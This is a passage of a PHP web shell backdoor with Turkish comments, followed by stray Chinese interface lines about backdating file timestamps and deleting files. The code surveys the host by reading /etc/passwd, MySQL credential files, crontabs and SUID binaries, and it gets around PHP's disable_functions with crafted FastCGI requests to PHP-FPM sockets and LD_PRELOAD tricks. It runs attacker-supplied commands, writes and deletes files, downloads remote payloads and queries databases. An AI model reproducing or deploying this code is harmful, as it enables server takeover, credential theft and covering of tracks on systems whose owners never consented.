(array('curl','sockets','mbstring','imap','pcntl','mysqli','pdo_mysql') as $e) $exts[$e] = extension_loaded($e); $d['extensions'] = $exts; // FPM socket tarama $all_socks = array( '/tmp/php-cgi-80.sock', '/tmp/php80-fpm.sock', '/tmp/php-8.0-fpm.sock', '/run/php/php8.0-fpm.sock', '/var/run/php/php8.0-fpm.sock', '/tmp/php-cgi-74.sock', '/tmp/php74-fpm.sock', '/run/php/php7.4-fpm.sock', '/var/run/php/php7.4-fpm.sock', '/tmp/php-cgi-82.sock', '/tmp/php82-fpm.sock', '/run/php/php8.2-fpm.sock', '/var/run/php/php8.2-fpm.sock', '/tmp/php-cgi-81.sock', '/run/php/php8.1-fpm.sock', ); $fpm_socks = array(); foreach ($all_socks as $sk) { if (file_exists($sk)) { $fp = @stream_socket_client("unix://$sk", $en, $em, 2); $fpm_socks[$sk] = $fp ? 'connectable' : 'exists_no_connect'; if ($fp) fclose($fp); } } $d['fpm_sockets'] = $fpm_socks; // Sendmail / MTA binary varlığı $mta = null; foreach (array('/usr/sbin/sendmail','/usr/bin/sendmail','/usr/bin/msmtp', '/usr/bin/ssmtp','/usr/sbin/exim','/usr/sbin/postfix') as $b) if (file_exists($b)) { $mta = $b; break; } $d['mta_binary'] = $mta; // LD_PRELOAD .so durumu $d['ld_so_exists'] = file_exists('/tmp/.ag_ld.so'); $d['ld_so_exec'] = file_exists('/tmp/.ag_ld.so') && is_executable('/tmp/.ag_ld.so'); // /proc erişimi $d['proc_self_cmdline'] = @file_get_contents('/proc/self/cmdline'); $d['proc_self_environ_readable'] = is_readable('/proc/self/environ'); // Kullanılabilir binary'ler $bins = array(); foreach (array('/usr/bin/python3','/usr/bin/python','/usr/bin/python2', '/usr/bin/perl','/usr/bin/ruby','/usr/bin/gcc','/usr/bin/g++', '/usr/bin/curl','/usr/bin/wget','/usr/bin/nc','/bin/nc', '/usr/bin/ncat','/usr/bin/nmap','/usr/bin/php', '/usr/local/bin/php','/usr/bin/git') as $b) if (file_exists($b)) $bins[] = $b; $d['available_binaries'] = $bins; // /etc/passwd — bash kullananlar $passwd = @file_get_contents('/etc/passwd'); if ($passwd) { $lines = explode("\n", $passwd); $d['passwd_bash_users'] = array_values(array_filter($lines, function($l) { return strpos($l, '/bin/bash') !== false || strpos($l, '/bin/sh') !== false; })); } // MySQL config tarama $mysql_cfg = null; foreach (array('/www/server/panel/data/default.pl','/root/.my.cnf', '/etc/mysql/debian.cnf','/www/server/mysql/conf/my.cnf', '/etc/mysql/my.cnf') as $f) { if (file_exists($f)) { $mysql_cfg = array('file' => $f, 'content' => @file_get_contents($f)); break; } } $d['mysql_config'] = $mysql_cfg; // Cron visibility $d['crontab_current'] = @file_get_contents('/var/spool/cron/crontabs/' . $d['user']); $d['crontab_root'] = @file_get_contents('/var/spool/cron/crontabs/root'); $d['cron_d'] = array(); $dh = @opendir('/etc/cron.d'); if ($dh) { while (($f = readdir($dh)) !== false) if ($f[0] !== '.') $d['cron_d'][] = $f; closedir($dh); } // SUID dosya varlık hızlı tarama (exec olmadan, sadece dosya okuma) $known_suid = array('/usr/bin/pkexec','/usr/bin/sudo','/usr/bin/newuidmap', '/usr/bin/newgidmap','/usr/sbin/pppd','/usr/bin/at', '/usr/lib/policykit-1/polkit-agent-helper-1'); $suid_found = array(); foreach ($known_suid as $b) if (file_exists($b)) $suid_found[] = $b; $d['known_suid_binaries'] = $suid_found; // Kernel & CVE ipuçları preg_match('/(\d+\.\d+\.\d+)/', php_uname(), $m); $kver = isset($m[1]) ? $m[1] : ''; $d['kernel_version'] = $kver; $d['gameoverlay_candidate'] = (version_compare($kver, '5.15.0', '>=') && version_compare($kver, '6.4.0', '<')); // FPM sendmail_path bypass test $d['fpm_sm_test'] = null; if (!empty($fpm_socks)) { $first_sock = array_key_first($fpm_socks); if ($fpm_socks[$first_sock] === 'connectable') { $id2 = substr(md5(mt_rand()), 0, 8); $wrapper2 = '/tmp/.asw_diag_' . $id2; $outf2 = '/tmp/.aso_diag_' . $id2; $evil2 = '/tmp/.ase_diag_' . $id2 . '.php'; @unlink($outf2); file_put_contents($wrapper2, "#!/bin/bash\necho 'FPM_SM_OK' > " . $outf2 . "\nexit 0\n"); @chmod($wrapper2, 0755); file_put_contents($evil2, '<?php @mail("x@x.x","x","x"); ?>'); // Inline FCGI gönder $fp2 = @stream_socket_client("unix://" . $first_sock, $en2, $em2, 3); if ($fp2) { $pr2 = array( "GATEWAY_INTERFACE"=>"FastCGI/1.0","REQUEST_METHOD"=>"GET", "SCRIPT_FILENAME"=>$evil2,"SCRIPT_NAME"=>"/".basename($evil2), "SERVER_SOFTWARE"=>"php","REMOTE_ADDR"=>"127.0.0.1", "SERVER_ADDR"=>"127.0.0.1","SERVER_PORT"=>"80","SERVER_NAME"=>"localhost", "SERVER_PROTOCOL"=>"HTTP/1.1","CONTENT_TYPE"=>"","CONTENT_LENGTH"=>"0", "QUERY_STRING"=>"","PHP_ADMIN_VALUE"=>"sendmail_path=".$wrapper2."\nopen_basedir=/", ); $enc2=''; foreach($pr2 as $k=>$v){ $kl=strlen($k);$vl=strlen($v); $enc2.=($kl>127)?pack("N",$kl|0x80000000):chr($kl); $enc2.=($vl>127)?pack("N",$vl|0x80000000):chr($vl); $enc2.=$k.$v; } $pl2=(8-(strlen($enc2)%8))%8; $hdr2=pack("CCnnCC",1,4,1,strlen($enc2),$pl2,0); $enc2p=$hdr2.$enc2.str_repeat("\x00",$pl2); $beg2=pack("CCnnCC",1,1,1,8,0,0).pack("nCx5",1,0); $em2p=pack("CCnnCC",1,4,1,0,0,0); $st2=pack("CCnnCC",1,5,1,0,0,0); fwrite($fp2,$beg2.$enc2p.$em2p.$st2); stream_set_timeout($fp2,8); $raw2=''; while(!feof($fp2)){$x=fread($fp2,4096);if(!$x)break;$raw2.=$x;} fclose($fp2); usleep(1000000); $d['fpm_sm_test'] = file_exists($outf2) ? trim(file_get_contents($outf2)) : 'no_output'; @unlink($outf2); @unlink($wrapper2); @unlink($evil2); } else { @unlink($wrapper2); @unlink($evil2); $d['fpm_sm_test'] = 'socket_connect_failed'; } } } echo json_encode($d); exit; } // ===================== recon — tek seferde tam keşif ===================== if ($action === 'recon') { $data = array('status' => 'success'); $data['php_version'] = phpversion(); $data['sapi'] = php_sapi_name(); $data['os'] = PHP_OS; $data['uname'] = php_uname(); $data['user'] = get_current_user(); $data['uid'] = function_exists('posix_geteuid') ? posix_geteuid() : '?'; $data['cwd'] = getcwd(); $data['doc_root'] = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; $data['open_basedir'] = ini_get('open_basedir'); $data['tmp_writable'] = is_writable('/tmp'); $data['webdir_writable'] = is_writable(dirname(__FILE__)); $data['disable_functions'] = str_replace(' ', '', ini_get('disable_functions')); $exec_fns = array(); foreach (array('exec','shell_exec','system','passthru','popen','proc_open','pcntl_exec') as $fn) $exec_fns[$fn] = _fn($fn); $data['exec_functions'] = $exec_fns; $exts = array(); foreach (array('FFI','Imagick','curl','imap','mbstring') as $e) $exts[$e] = ($e === 'FFI' || $e === 'Imagick') ? class_exists($e) : extension_loaded($e); $data['extensions'] = $exts; $bypass = array(); foreach (array('putenv','mail','error_log','mb_send_mail','iconv') as $fn) $bypass[$fn] = _fn($fn); $data['bypass_functions'] = $bypass; $exec_test = smart_run('echo AG_EXEC_OK'); if ($exec_test !== null) { $data['exec_works'] = true; $data['exec_method'] = $exec_test['method']; } else { $data['exec_works'] = false; $data['exec_method'] = null; } if (!empty($data['exec_works'])) { $sr = function($c) use ($exec_test) { $m = $exec_test['method']; if ($m === 'direct') return run($c); if ($m === 'ffi') return run_ffi($c); if ($m === 'cgi') return run_cgi($c); if ($m === 'ld_preload')return run_ld($c); if ($m === 'imagick') return run_imgk($c); if ($m === 'fpm_sm') return run_fpm_sm($c); return null; }; $data['id'] = trim($sr('id')); $data['hostname'] = trim($sr('hostname')); $data['kernel'] = trim($sr('uname -r')); $data['distro'] = trim($sr('cat /etc/os-release 2>/dev/null | head -3')); $tools = array(); foreach (array('gcc','python3','python','perl','unshare','setcap','getcap', 'curl','wget','pkexec','sudo','docker','lxc') as $t) { $w = $sr('which ' . $t . ' 2>/dev/null'); $tools[$t] = ($w !== null && trim($w) !== '') ? trim($w) : false; } $data['tools'] = $tools; $data['userns_clone'] = trim($sr('cat /proc/sys/kernel/unprivileged_userns_clone 2>/dev/null')); $data['max_user_namespaces']= trim($sr('cat /proc/sys/user/max_user_namespaces 2>/dev/null')); $data['suid_files'] = trim($sr('find / -perm -4000 -type f 2>/dev/null | head -25')); $data['pkexec_version'] = trim($sr('pkexec --version 2>/dev/null')); $data['sudo_l'] = trim($sr('sudo -n -l 2>&1')); $data['writable_tmp'] = trim($sr('ls -la /tmp/ 2>/dev/null | head -5')); $data['passwd_users'] = trim($sr('cat /etc/passwd 2>/dev/null | grep -c "/bin/bash"')); $data['home_dirs'] = trim($sr('ls -la /home/ 2>/dev/null')); } echo json_encode($data); exit; } // ===================== exec — komut çalıştır ===================== if ($action === 'exec') { $command = isset($_POST['command']) ? $_POST['command'] : ''; $method = isset($_POST['method']) ? $_POST['method'] : 'auto'; if (empty($command)) { echo json_encode(array('status' => 'error', 'message' => 'Komut boş')); exit; } $dir = isset($_POST['dir']) ? $_POST['dir'] : ''; if ($dir) $command = 'cd ' . escapeshellarg($dir) . ' && ' . $command; $output = null; $used_method = null; if ($method === 'auto' || $method === 'smart') { $r = smart_run($command); if ($r !== null) { $output = $r['output']; $used_method = $r['method']; } } elseif ($method === 'direct') { $output = run($command); $used_method = 'direct'; } elseif ($method === 'ffi') { $output = run_ffi($command); $used_method = 'ffi'; } elseif ($method === 'cgi') { $output = run_cgi($command); $used_method = 'cgi'; } elseif ($method === 'ld' || $method === 'ldp') { $output = run_ld($command); $used_method = 'ld_preload'; } elseif ($method === 'imagick') { $output = run_imgk($command); $used_method = 'imagick'; } elseif ($method === 'fpm_sm' || $method === 'fpm') { $output = run_fpm_sm($command); $used_method = 'fpm_sm'; } if ($output === null) echo json_encode(array('status' => 'error', 'message' => 'Çalıştırılamadı', 'method' => $used_method)); else echo json_encode(array('status' => 'success', 'output' => $output, 'method' => $used_method)); exit; } // ===================== fpm_exec — FPM socket bypass (ham) ===================== if ($action === 'fpm_exec') { $cmd = isset($_POST['command']) ? $_POST['command'] : 'id'; $output = run_fpm_sm($cmd); // FPM FCGI body da döndür (diagnostik için) $all_socks = array( '/tmp/php-cgi-80.sock', '/tmp/php80-fpm.sock', '/tmp/php-8.0-fpm.sock', '/run/php/php8.0-fpm.sock', '/var/run/php/php8.0-fpm.sock', '/tmp/php74-fpm.sock', '/run/php/php7.4-fpm.sock', '/tmp/php82-fpm.sock', '/run/php/php8.2-fpm.sock', ); $available_socks = array(); foreach ($all_socks as $sk) if (file_exists($sk)) $available_socks[] = $sk; if ($output !== null) echo json_encode(array('status' => 'success', 'output' => $output, 'method' => 'fpm_sm', 'sockets' => $available_socks)); else echo json_encode(array('status' => 'error', 'message' => 'fpm_sm başarısız', 'sockets' => $available_socks)); exit; } // ===================== fpm_diag — FPM bypass ayrıntılı tanı ===================== if ($action === 'fpm_diag') { $d = array('status' => 'success'); $all_socks = array( '/tmp/php-cgi-80.sock', '/tmp/php80-fpm.sock', '/tmp/php-8.0-fpm.sock', '/run/php/php8.0-fpm.sock', '/var/run/php/php8.0-fpm.sock', '/tmp/php-cgi-74.sock', '/tmp/php74-fpm.sock', '/run/php/php7.4-fpm.sock', '/var/run/php/php7.4-fpm.sock', '/tmp/php-cgi-82.sock', '/tmp/php82-fpm.sock', '/run/php/php8.2-fpm.sock', ); $d['sockets'] = array(); foreach ($all_socks as $sk) { if (!file_exists($sk)) continue; $fp = @stream_socket_client("unix://$sk", $en, $em, 2); $d['sockets'][$sk] = $fp ? 'ok' : $em; if ($fp) fclose($fp); } // evil.php'yi /tmp'a yaz ve sendmail_path değerini FPM bağlamında oku if (!empty($d['sockets'])) { $first = array_key_first($d['sockets']); if ($d['sockets'][$first] === 'ok') { $id = substr(md5(mt_rand()), 0, 8); $evil = '/tmp/.ase_fdg_' . $id . '.php'; file_put_contents($evil, '<?php header("Content-Type:application/json"); echo json_encode(["sp"=>ini_get("sendmail_path"),"od"=>ini_get("open_basedir"),"df"=>ini_get("disable_functions"),"mail"=>function_exists("mail"),"chmod_test"=>@chmod("/tmp/.ase_fdg_chmod_test",0755)]); ?>'); $pr = array( "GATEWAY_INTERFACE"=>"FastCGI/1.0","REQUEST_METHOD"=>"GET", "SCRIPT_FILENAME"=>$evil,"SCRIPT_NAME"=>"/".basename($evil), "SERVER_SOFTWARE"=>"php","REMOTE_ADDR"=>"127.0.0.1", "SERVER_ADDR"=>"127.0.0.1","SERVER_PORT"=>"80","SERVER_NAME"=>"localhost", "SERVER_PROTOCOL"=>"HTTP/1.1","CONTENT_TYPE"=>"","CONTENT_LENGTH"=>"0", "QUERY_STRING"=>"","PHP_ADMIN_VALUE"=>"sendmail_path=/tmp/CUSTOM_TEST_PATH\nopen_basedir=/", ); $enc=''; foreach($pr as $k=>$v){ $kl=strlen($k);$vl=strlen($v); $enc.=($kl>127)?pack("N",$kl|0x80000000):chr($kl); $enc.=($vl>127)?pack("N",$vl|0x80000000):chr($vl); $enc.=$k.$v; } $pl=(8-(strlen($enc)%8))%8; $beg=pack("CCnnCC",1,1,1,8,0,0).pack("nCx5",1,0); $phdr=pack("CCnnCC",1,4,1,strlen($enc),$pl,0).$enc.str_repeat("\x00",$pl); $pend=pack("CCnnCC",1,4,1,0,0,0); $sin=pack("CCnnCC",1,5,1,0,0,0); $fp2 = @stream_socket_client("unix://$first", $en, $em, 5); if ($fp2) { fwrite($fp2, $beg.$phdr.$pend.$sin); $raw=''; stream_set_timeout($fp2,10); while(!feof($fp2)){$x=fread($fp2,4096);if(!$x)break;$raw.=$x;} fclose($fp2); $pos=strpos($raw,"\r\n\r\n"); $body=$pos!==false?substr($raw,$pos+4):$raw; $d['fcgi_body'] = $body; $d['sp_override_works'] = (strpos($body,'CUSTOM_TEST_PATH') !== false); @unlink($evil); } } } // Wrapper chmod test $wtest = '/tmp/.asw_test_' . substr(md5(mt_rand()),0,6); file_put_contents($wtest, "#!/bin/bash\necho test\n"); $chmod_ok = @chmod($wtest, 0755); $d['wrapper_chmod'] = $chmod_ok; $d['wrapper_executable'] = is_executable($wtest); @unlink($wtest); $d['mta_exists'] = null; foreach (array('/usr/sbin/sendmail','/usr/bin/msmtp','/usr/bin/ssmtp') as $b) if (file_exists($b)) { $d['mta_exists'] = $b; break; } echo json_encode($d); exit; } // ===================== write_file ===================== if ($action === 'write_file') { $path = isset($_POST['path']) ? $_POST['path'] : ''; $content = isset($_POST['content']) ? $_POST['content'] : ''; $mode = isset($_POST['mode']) ? $_POST['mode'] : ''; $decode = isset($_POST['decode']) ? $_POST['decode'] : ''; $append = isset($_POST['append']) ? $_POST['append'] : ''; if (empty($path)) { echo json_encode(array('status' => 'error', 'message' => 'Dosya yolu boş')); exit; } if ($decode === 'base64') $content = base64_decode($content); $r = ($append === '1') ? @file_put_contents($path, $content, FILE_APPEND) : @file_put_contents($path, $content); if ($r !== false) { if ($mode) @chmod($path, octdec($mode)); echo json_encode(array('status' => 'success', 'bytes' => $r)); } else { echo json_encode(array('status' => 'error', 'message' => 'Yazılamadı')); } exit; } // ===================== read_file ===================== if ($action === 'read_file') { $path = isset($_POST['path']) ? $_POST['path'] : ''; if (empty($path)) { echo json_encode(array('status' => 'error', 'message' => 'Dosya yolu boş')); exit; } if (!file_exists($path)) { echo json_encode(array('status' => 'error', 'message' => 'Dosya bulunamadı')); exit; } $content = @file_get_contents($path); if ($content === false) echo json_encode(array('status' => 'error', 'message' => 'Okunamadı')); else echo json_encode(array('status' => 'success', 'content' => $content, 'size' => strlen($content))); exit; } // ===================== list_dir — dizin listele ===================== if ($action === 'list_dir') { $path = isset($_POST['path']) ? $_POST['path'] : getcwd(); if (!is_dir($path)) { echo json_encode(array('status' => 'error', 'message' => 'Dizin değil')); exit; } $items = array(); $dh = @opendir($path); if ($dh) { while (($f = readdir($dh)) !== false) { if ($f === '.' || $f === '..') continue; $fp = rtrim($path, '/') . '/' . $f; $items[] = array( 'name' => $f, 'type' => is_dir($fp) ? 'dir' : 'file', 'size' => is_file($fp) ? filesize($fp) : null, 'mtime' => @filemtime($fp), 'perms' => substr(sprintf('%o', @fileperms($fp)), -4), ); } closedir($dh); } usort($items, function($a, $b) { return strcmp($a['type'].$a['name'], $b['type'].$b['name']); }); echo json_encode(array('status' => 'success', 'path' => $path, 'count' => count($items), 'items' => $items)); exit; } // ===================== delete_file — dosya sil ===================== if ($action === 'delete_file') { $path = isset($_POST['path']) ? $_POST['path'] : ''; if (!$path) { echo json_encode(array('status' => 'error', 'message' => 'Yol boş')); exit; } echo @unlink($path) ? json_encode(array('status' => 'success', 'deleted' => $path)) : json_encode(array('status' => 'error', 'message' => 'Silinemedi')); exit; } // ===================== find_writable — yazılabilir dizin tara ===================== if ($action === 'find_writable') { $base = isset($_POST['path']) ? $_POST['path'] : '/'; $depth = isset($_POST['depth']) ? (int)$_POST['depth'] : 3; $result = array(); $scan = function($dir, $cur) use (&$scan, &$result, $depth) { if ($cur > $depth) return; $dh = @opendir($dir); if (!$dh) return; while (($f = readdir($dh)) !== false) { if ($f === '.' || $f === '..') continue; $fp = rtrim($dir, '/') . '/' . $f; if (@is_dir($fp) && @is_writable($fp)) { $result[] = $fp; $scan($fp, $cur + 1); } } closedir($dh); }; if (@is_writable($base)) $result[] = $base; $scan($base, 0); echo json_encode(array('status' => 'success', 'base' => $base, 'writable' => $result)); exit; } // ===================== download — URL'den dosya indir ===================== if ($action === 'download') { $url = isset($_POST['url']) ? $_POST['url'] : ''; $dest = isset($_POST['dest']) ? $_POST['dest'] : ''; if (!$url || !$dest) { echo json_encode(array('status' => 'error', 'message' => 'url ve dest gerekli')); exit; } $data = null; $err = ''; if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 60); $data = curl_exec($ch); $err = curl_error($ch); curl_close($ch); } elseif (ini_get('allow_url_fopen')) { $data = @file_get_contents($url); } if ($data && strlen($data) > 0) { $bytes = @file_put_contents($dest, $data); echo json_encode(array('status' => 'success', 'bytes' => $bytes, 'dest' => $dest)); } else { echo json_encode(array('status' => 'error', 'message' => $err ?: 'indirilemedi', 'size' => strlen($data ?: ''))); } exit; } // ===================== mysql — MySQL sorgusu çalıştır ===================== if ($action === 'mysql') { $host = isset($_POST['host']) ? $_POST['host'] : '127.0.0.1'; $port = isset($_POST['port']) ? (int)$_POST['port'] : 3306; $user = isset($_POST['user']) ? $_POST['user'] : ''; $pass = isset($_POST['pass']) ? $_POST['pass'] : ''; $db = isset($_POST['db']) ? $_POST['db'] : ''; $query = isset($_POST['query']) ? $_POST['query'] : ''; if (!$query) { echo json_encode(array('status' => 'error', 'message' => 'Query boş')); exit; } if (!function_exists('mysqli_connect')) { echo json_encode(array('status' => 'error', 'message' => 'mysqli yok')); exit; } $conn = @mysqli_connect($host, $user, $pass, $db, $port); if (!$conn) { echo json_encode(array('status' => 'error', 'message' => mysqli_connect_error())); exit; } $res = @mysqli_query($conn, $query); if ($res === false) { echo json_encode(array('status' => 'error', 'message' => mysqli_error($conn))); } elseif ($res === true) { echo json_encode(array('status' => 'success', 'affected' => mysqli_affected_rows($conn))); } else { $rows = array(); while ($row = mysqli_fetch_assoc($res)) $rows[] = $row; echo json_encode(array('status' => 'success', 'rows' => $rows, 'count' => count($rows))); } mysqli_close($conn); exit; } // ===================== curl_req — sunucu tarafından HTTP isteği ===================== if ($action === 'curl_req') { $url = isset($_POST['url']) ? $_POST['url'] : ''; $method = strtoupper(isset($_POST['method']) ? $_POST['method'] : 'GET'); $headers = isset($_POST['headers']) ? (array)$_POST['headers'] : array(); $body = isset($_POST['body']) ? $_POST['body'] : ''; if (!$url) { echo json_encode(array('status' => 'error', 'message' => 'URL boş')); exit; } if (!function_exists('curl_init')) { echo json_encode(array('status' => 'error', 'message' => 'curl yok')); exit; } $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_HEADER, true); if ($headers) curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); if ($method === 'POST') { curl_setopt($ch, CURLOPT_POST, true); if ($body) curl_setopt($ch, CURLOPT_POSTFIELDS, $body); } elseif ($method !== 'GET') { curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($body) curl_setopt($ch, CURLOPT_POSTFIELDS, $body); } $resp = curl_exec($ch); $info = curl_getinfo($ch); $err = curl_error($ch); curl_close($ch); $hs = $info['header_size']; echo json_encode(array( 'status' => 'success', 'http_code' => $info['http_code'], 'headers' => substr($resp, 0, $hs), 'body' => substr($resp, $hs), 'error' => $err, )); exit; } // ===================== Bilinmeyen ===================== echo json_encode(array( 'status' => 'error', 'message' => 'Bilinmeyen komut', 'available' => array( 'ping','info','diag','recon', 'exec','fpm_exec','fpm_diag', 'write_file','read_file','list_dir','delete_file', 'find_writable','download','mysql','curl_req', ), ));
修改文件时间
将文件时间修改为当前时间的前一年
删除文件